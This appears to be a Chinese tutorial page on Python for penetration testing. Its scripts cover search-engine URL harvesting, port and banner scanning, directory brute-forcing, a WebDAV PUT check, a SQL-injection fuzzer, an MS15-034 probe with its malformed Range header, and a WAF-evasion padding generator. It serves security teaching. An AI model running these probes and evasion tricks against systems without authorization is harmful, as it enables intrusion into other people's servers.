python安全编程基础内容
文章目錄
- 基礎語法部分
- socket
- if語句
- for循環
- 函數
- 異常處理
- 線程
- argparse基本用法
- 獲取banner(服務名稱和版本)信息
- 編寫poc和exp
- 正則表達,網絡編程,套接字
- 模塊部分
- 模塊的概念
- 模塊導入
- python腳本基礎結構
- sys模塊
- 文件操作
- os模塊
- 基礎階段腳本
- 百度url收集腳本
- 四大件收集腳本
- 多線程獲取banner信息
- 目錄掃描工具
- PUT寫入
- 獲取服務器版本和腳本類型
- sql爆錯注入poc
- ms15_034 poc
- 萬能繞waf腳本(只能部分)
基礎語法部分
本文很水,只是隨心記錄,不喜勿噴,大佬繞過
socket
所謂套接字(Socket),就是對網絡中不同主機上的應用進程之間進行雙向通信的端點的抽象。一個套接字就是網絡上進程通信的一端,提供了應用層進程利用網絡協議交換數據的機制。從所處的地位來講,套接字上聯應用進程,下聯網絡協議棧,是應用程序通過網絡協議進行通信的接口,是應用程序與網絡協議棧進行交互的接口。
if語句
for循環
函數
異常處理
異常處理—傳送門
線程
argparse基本用法
用于傳遞用戶輸入的參數
argparse基本用法----傳送門
獲取banner(服務名稱和版本)信息
工具獲取banner信息
python獲取banner信息
代碼改進1—添加if語句判斷2.3.4是否在banner信息中
可見if目錄
代碼改進2–添加try
代碼改進3–創建函數并調用
可見函數目錄
編寫poc和exp
編寫poc和exp----傳送門
正則表達,網絡編程,套接字
傳送門
模塊部分
模塊的概念
模塊導入
python腳本基礎結構
sys模塊
文件操作
傳送門—文件操作
os模塊
基礎階段腳本
百度url收集腳本
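#!/usr/bin/env python
# coding:utf-8
# code by aedoo
# github: https://github.com/aedoo/
"""百度url收集腳本 — collect result URLs from Baidu search pages.

Usage: ``python <script> keyword``

The 75 result pages for *keyword* are queued; worker threads fetch each page,
follow every result link and record the links that answer 200 in
``original_url.txt`` (final URL after redirects) and ``home_url.txt``
(``scheme://host`` of that URL).  Written so it runs on Python 2 and 3.
"""
import re
import sys
import threading
import time

import requests
from bs4 import BeautifulSoup

try:  # Python 3
    import queue as Queue
    from urllib.parse import urlparse
except ImportError:  # Python 2
    import Queue
    from urlparse import urlparse

# Request headers shared by every worker (the original assigned them to a
# ``global head`` inside main()).
HEAD = {
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate, sdch, br',
    'Accept-Language': 'zh-CN,zh;q=0.8',
}
head = HEAD  # old global name, kept for anything that still reads it

# Many workers append to the same two files; serialise the writes.
_write_lock = threading.Lock()


class BaiDuUrlSpider(threading.Thread):
    """Worker thread: takes search-page URLs from *queue* until it runs dry."""

    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.__queue = queue

    def run(self):
        """Process queue items until a timed get() reports the queue empty."""
        while True:
            try:
                # ``empty()`` followed by ``get()`` races with the other
                # workers and raised Empty inside the loop; a timed get()
                # raising Empty is the reliable end-of-work signal.
                page_url = self.__queue.get(timeout=0.5)
            except Queue.Empty:
                break
            try:
                self.spider(page_url)
            except Exception as exc:
                # One bad page must not kill the worker, but the failure is
                # reported rather than silently swallowed.
                sys.stderr.write('[!] %s: %s\n' % (page_url, exc))

    def spider(self, page_url):
        """Fetch one search page, follow each result link, record the 200s."""
        r = requests.get(url=page_url, headers=HEAD, timeout=10)
        soup = BeautifulSoup(r.content, 'lxml')
        # Baidu result links carry a data-click attribute and no class.
        raw_url = soup.find_all(name='a', attrs={'data-click': re.compile('.'), 'class': None})
        # ``with`` closes both files even when a request raises; the
        # original leaked the handles on any exception.
        with open('original_url.txt', 'a+') as f1, open('home_url.txt', 'a+') as f2:
            for raw in raw_url:
                trick_url = raw.get('href')
                if not trick_url:
                    continue
                response = requests.get(url=trick_url, headers=HEAD, timeout=3)
                if response.status_code != 200:
                    print(response.status_code)
                    continue
                original_url = response.url
                parts = urlparse(original_url)
                home_url = '%s://%s' % (parts.scheme, parts.netloc)
                print(original_url)
                print(home_url)
                with _write_lock:
                    f1.write(original_url + '\n')
                    f2.write(home_url + '\n')


def main():
    """Queue the 75 Baidu result pages for ``sys.argv[1]`` and run the workers."""
    if len(sys.argv) != 2:
        print('python Usage: %s keyword' % sys.argv[0])
        sys.exit(-1)
    keyword = sys.argv[1]
    queue = Queue.Queue()
    # Baidu serves at most 75 pages of 10 results; ``pn`` is the result offset.
    url_start = 'https://www.baidu.com/s?wd=' + keyword + '&rn=10&pn='
    for offset in range(0, 750, 10):
        queue.put(url_start + str(offset))
    # The original started 200 threads; more workers than pages is pointless,
    # so 200 is kept only as an upper bound.
    threads_count = min(200, queue.qsize())
    threads = [BaiDuUrlSpider(queue) for _ in range(threads_count)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()


if __name__ == '__main__':
    # Start from empty output files; the workers append to them.
    open('original_url.txt', 'w').close()
    open('home_url.txt', 'w').close()
    time_start = time.time()
    main()
    print(time.time() - time_start)

# Next page section: 四大件收集腳本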
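"""四大件收集腳本 — collect four basic facts about a web target.

Exactly one check runs per invocation:
  -x  OS guess: the URL is fetched as given and with the case of its last
      character flipped; differing bodies point to a case-sensitive path.
  -t  database ports: TCP connect to 1433, 1521 and 3306 on the host.
  -g  scheme, status code, Server and Content-Type headers.
  -j  X-Powered-By header.
"""
import requests
import os
import socket
import time
import optparse
from bs4 import BeautifulSoup
from urllib.parse import urlparse

# Browser-like User-Agent sent by the header checks.
HEADERS = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'}
TIMEOUT = 10  # seconds, applied to every HTTP request

# (port, message when a connection succeeds, message when it does not)
DB_PORTS = (
    (1433, '[+]MSSQL數據庫開放', '[-]1433關閉'),
    (1521, '[+]oracle數據庫開放', '[-]1521端口關閉'),
    (3306, '[+]MYSQL數據庫開放', '[-]3306關閉'),
)


def main():
    """Parse the command line and dispatch to exactly one check."""
    # One option per line; the original concatenated them without separators.
    usage = '\n'.join(('-x 判斷系統類型', '-t 判斷數據庫類型', '-g 判斷服務架構', '-j 判斷網站語言'))
    parser = optparse.OptionParser(usage)
    parser.add_option('-x', dest='system', help='判斷系統,判斷原理通過目錄來判斷例:https://www.btime.com/finance')
    parser.add_option('-t', dest='database', help='判斷數據庫,通過端口來判斷數據庫類型')
    parser.add_option('-g', dest='headerss', help='判斷架構')
    parser.add_option('-j', dest='language', help='判斷語言')
    options, _args = parser.parse_args()
    # Same precedence as the original if/elif chain.
    dispatch = (
        (options.system, SYSTEM),
        (options.database, DATABASE),
        (options.language, LANGUAGE),
        (options.headerss, HEADERSS),
    )
    for value, check in dispatch:
        if value:
            check(value)
            return
    parser.print_help()
    raise SystemExit(0)


def SYSTEM(system):
    """Guess the OS family from path case sensitivity.

    *system* is requested twice: as given and with the case of its last
    character flipped.  Differing bodies mean the path is case sensitive,
    which this heuristic reports as Linux.  Dynamic pages can differ between
    two fetches regardless, so the answer is a hint, not a fact.
    """
    sc = '{}'.format(system)
    if not sc or not sc[-1].isalpha():
        print('[-]URL 最後一個字元不是字母,無法比較大小寫')
        return
    # The original used ``sc.strip(sc[-1]) + sc[-1].capitalize()``, which also
    # stripped that character from the front of the URL and changed nothing
    # for an upper-case last letter; swapping the case of the last character
    # is what was meant.
    url = sc[:-1] + sc[-1].swapcase()
    sg = requests.get(url, headers=HEADERS, timeout=TIMEOUT)
    print(sg.url)
    a = requests.get(sc, headers=HEADERS, timeout=TIMEOUT).content
    b = sg.content  # the original fetched the flipped URL a second time
    if a != b:
        print('系統是:Linux')
    else:
        print('系統是:windows')


def DATABASE(database):
    """Report which of the common database ports accept a TCP connection.

    A fresh socket is used per port: a socket whose connect() failed or
    succeeded cannot be connected again, so the original reported every port
    after the first one as closed.
    """
    for port, open_msg, closed_msg in DB_PORTS:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(3)
            try:
                s.connect((database, port))
            except OSError:  # covers timeout, refused and DNS failures
                print(closed_msg)
            else:
                print(open_msg)
        time.sleep(0.1)


def HEADERSS(headerss):
    """Print scheme, status code, Server and Content-Type for *headerss*."""
    url = '{}'.format(headerss)
    r = requests.get(url, headers=HEADERS, timeout=TIMEOUT)
    # The original printed the first four characters one at a time
    # ("h t t p"); the scheme is what it was after.
    print('[+]協議類型:', urlparse(url).scheme, '/', r.status_code)
    # Both headers are optional; .get() avoids a KeyError when one is missing.
    print('[+]服務架構:', r.headers.get('Server'))
    print('[+]頁面類型', r.headers.get('Content-Type'))


def LANGUAGE(language):
    """Print the X-Powered-By header, or say that it was not present."""
    url = '{}'.format(language)
    g = requests.get(url, headers=HEADERS, timeout=TIMEOUT)
    powered_by = g.headers.get('X-Powered-By')
    if powered_by:
        print('[+]程序支持', powered_by)
    else:
        print('[-]沒有找出該網站的程序支持')


if __name__ == '__main__':
    main()

# Next page section: 多線程獲取banner信息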
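"""多線程獲取banner信息 — grab the service banner from every host in a list.

Usage: ``python banner.py -r ip.txt -p 21``

One thread per host connects to the port, reads up to 1024 bytes and reports
whether the banner contains the version string the check looks for.
"""
import socket
import argparse
import threading
import sys
import os

parse = argparse.ArgumentParser(description="You can try : python banner.py -r ip.txt -p 21")
parse.add_argument('-r', '--dic', dest='diction', help='Please enter your dictionary', type=str, required=True)
parse.add_argument('-p', '--port', dest='port', help='Please enter your port', type=int, required=True)


def getBanner(ip, port, timeout=2):
    """Return the first 1024 bytes the service sends, as text, or None.

    Args:
        ip: host name or address.
        port: TCP port number.
        timeout: connect/read timeout in seconds (the original set a
            process-wide default of 2 s).

    Returns:
        The banner decoded as UTF-8 (undecodable bytes replaced), or None
        when the connection or the read fails.
    """
    try:
        # The original called ``s.connect(ip.port)`` — an attribute access on
        # a str — so every call raised and was swallowed by the bare except.
        with socket.create_connection((ip, port), timeout=timeout) as s:
            banner = s.recv(1024)
    except (OSError, OverflowError):
        return None
    # recv() returns bytes on Python 3; ``"2.3.4" in banner`` needs text.
    return banner.decode('utf-8', 'replace')


def checkVulns(ip, port, marker="2.3.4"):
    """Grab the banner of ip:port and print whether *marker* appears in it.

    The host is included in every line because many threads print at once.
    """
    banner = getBanner(ip, port)
    if not banner:
        print(ip + ' ' + 'not get banner')
    elif marker in banner:
        print(ip + ' ' + 'vulnerable')
    else:
        print(ip + ' ' + 'unvulnerable')


def main():
    """Read the host list given with -r and start one check thread per host."""
    args = parse.parse_args()
    try:
        with open(args.diction, 'r') as f:
            hosts = [line.strip() for line in f if line.strip()]
    except OSError as err:
        print('你的錯誤是:%s' % err)
        return
    threads = [threading.Thread(target=checkVulns, args=(ip, args.port)) for ip in hosts]
    for t in threads:
        t.start()
    for t in threads:
        t.join()


if __name__ == '__main__':
    main()

# Next page section: 目錄掃描工具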
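"""目錄掃描工具 — look for existing paths on a site using a wordlist.

Usage: ``python dirst.py -u http://www.baidu.com -d dir.txt``

Each wordlist line is appended to the base URL as given (no slash is added);
paths that answer 200 are printed.
"""
import argparse
import requests
import sys


def main():
    """Parse -u/-d, walk the wordlist and print every path answering 200."""
    parse = argparse.ArgumentParser(description="You can try : python dirst.py -u http://www.baidu.com -d dir.txt")
    # ``--uesr`` is the original (misspelt) long option, kept so existing
    # command lines keep working.
    parse.add_argument('-u', '--url', '--uesr', dest='name', help='Please enter your url', type=str, required=True)
    parse.add_argument('-d', '--dic', dest='diction', help='Please enter your dictionary', type=str, required=True)
    args = parse.parse_args()
    url = args.name
    diction = args.diction
    try:
        with open(diction, "r") as f:
            for line in f:
                line = line.strip()
                if not line:
                    continue
                try:
                    # A timeout stops one unresponsive path from hanging the
                    # scan, and a failed request no longer aborts the loop.
                    r = requests.get(url + line, timeout=10)
                except requests.RequestException as e:
                    print(str(e))
                    continue
                if r.status_code == 200:
                    print("find it:" + r.url)
    except OSError as e:
        print(str(e))


if __name__ == '__main__':
    main()

# Next page section: PUT寫入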
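"""PUT寫入 — check whether a server advertises PUT and MOVE via OPTIONS.

A host whose Allow/Public headers list both PUT and MOVE accepts file writes
over WebDAV; that is the misconfiguration the "iis put vuln" message refers to.
"""
import requests

url = 'http://192.168.1.103'


def check_put(target):
    """Send OPTIONS to *target* and print whether PUT and MOVE are allowed."""
    r = requests.options(target, timeout=10)
    # Either header may be absent (the original raised KeyError on 'Public'),
    # and str.find() returned -1 (truthy) for a missing verb, so the original
    # reported the vuln for almost any reply.  Membership tests on the parsed
    # method list are what was intended.
    advertised = ', '.join(v for v in (r.headers.get('Allow'), r.headers.get('Public')) if v)
    methods = {m.strip().upper() for m in advertised.split(',') if m.strip()}
    if 'PUT' in methods and 'MOVE' in methods:
        print(advertised)
        print('exist iis put vuln')
    else:
        print('no find')


if __name__ == '__main__':
    check_put(url)

# Next page section: 獲取服務器版本和腳本類型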
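"""獲取服務器版本和腳本類型 — print the Server and X-Powered-By headers."""
import requests

a = input('請寫入ip或域名:')
url = a
# The prompt asks for a bare IP or domain, but requests needs a scheme.
if '://' not in url:
    url = 'http://' + url
r = requests.get(url, timeout=10)
# Both headers are optional; a missing one used to raise KeyError.
print('中間件:' + r.headers.get('Server', '未知'))
print('服務器語言:' + r.headers.get('X-Powered-By', '未知'))

# Next page section: sql爆錯注入poc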
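"""sql爆錯注入poc — substitute each wordlist line for FUZZ in a URL and look
for "SQL syntax" in the response body.

Usage: ``-u <url containing the word FUZZ> -d <wordlist>``
"""
import argparse
import requests
import sys
import math

parse = argparse.ArgumentParser(description="You can try : python dirst.py -u http://www.baidu.com -d dir.txt")
parse.add_argument('-u', '--url', '--uesr', dest='url', help='Please enter your url', type=str, required=True)
parse.add_argument('-d', '--dic', dest='diction', help='Please enter your dictionary', type=str, required=True)

# Set by main(); the original parsed the command line at import time, which
# made the module impossible to import without arguments.
url = None
sql_fuzz_dic = None
inject_urls = []
result_list = []  # URLs whose response contained the marker


def get_urls():
    """Return *url* with FUZZ replaced by each non-empty wordlist line."""
    with open(sql_fuzz_dic, 'r') as f:
        payloads = [line.strip() for line in f if line.strip()]
    return [url.replace("FUZZ", payload) for payload in payloads]


def text_sql():
    """Request every URL in *inject_urls* and report the ones that match."""
    for i in inject_urls:
        try:
            r = requests.get(url=i, timeout=10)
        except requests.RequestException as e:
            print(str(e))
            continue
        print('testing url:')
        print(r.url)
        # str.find() returns -1 (truthy) when the text is absent, so the
        # original appended every URL; ``in`` is the test that was meant.
        if "SQL syntax" in r.text:
            result_list.append(r.url)
    # The original compared the list with 0, which is never true.
    if not result_list:
        print('no sql')
    else:
        print('find it')
        for i in result_list:
            print(i)


def main():
    """Parse the arguments, build the URL list and run text_sql().

    The original defined text_sql() but never called it.
    """
    global url, sql_fuzz_dic, inject_urls
    args = parse.parse_args()
    url = args.url
    sql_fuzz_dic = args.diction
    inject_urls = get_urls()
    text_sql()


if __name__ == '__main__':
    main()

# Next page section: ms15_04 poc (MS15-034)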
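"""ms15_04 poc — check an IIS host for MS15-034 (HTTP.sys Range handling).

The request carries the Range header from the original script; on an
unpatched IIS 7.5/8.0 the reply body contains "Requested Range Not
Satisfiable".
"""
import requests

a = input('請輸入MS_15_034 IP或域名:')
url = a
# The prompt asks for a bare IP or domain, but requests needs a scheme.
if '://' not in url:
    url = 'http://' + url
header = {'Host': 'stuff', 'Range': 'bytes=0-18446744073709551615'}
r = requests.get(url, headers=header, timeout=10)
# Server may be absent (the original raised KeyError), and str.find()
# returned -1 (truthy) for "not found", so the original flagged nearly every
# server; substring membership is what was meant.
server = r.headers.get('Server', '')
if 'IIS/7.5' in server or 'IIS/8.0' in server:
    if 'Requested Range Not Satisfiable' in r.text:
        print('find ms15_034')  # the original message said "ms15_035"
    else:
        print('no find')  # the original printed nothing in this case
else:
    print('no find')

# Next page section: 萬能繞waf腳本(只能部分)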
# coding=utf-8
"""萬能繞waf腳本(只能部分) — print a block of random padding parameters.

Builds up to 50 query parameters with random alphabetic names (5–15 chars)
and random alphabetic values (20–25 chars), url-encodes them and prints the
result wrapped in ``&``.  Runs on import.
"""
import random
import string
from urllib import parse
# code by yzddMr6
varname_min = 5
varname_max = 15
data_min = 20
data_max = 25
num_min = 50
num_max = 100


def randstr(length):
    """Return *length* random ASCII letters (upper and lower case mixed)."""
    letters = (random.choice(string.ascii_letters) for _ in range(length))
    return ''.join(letters)


def main():
    """Print ``&<url-encoded random parameters>&`` to stdout."""
    data = {}
    for _ in range(num_min, num_max):
        # Value before name, as the right-hand side of ``data[k] = v`` is
        # evaluated first.
        value = randstr(random.randint(data_min, data_max))
        name = randstr(random.randint(varname_min, varname_max))
        data[name] = value
    print('&' + parse.urlencode(data) + '&')


main()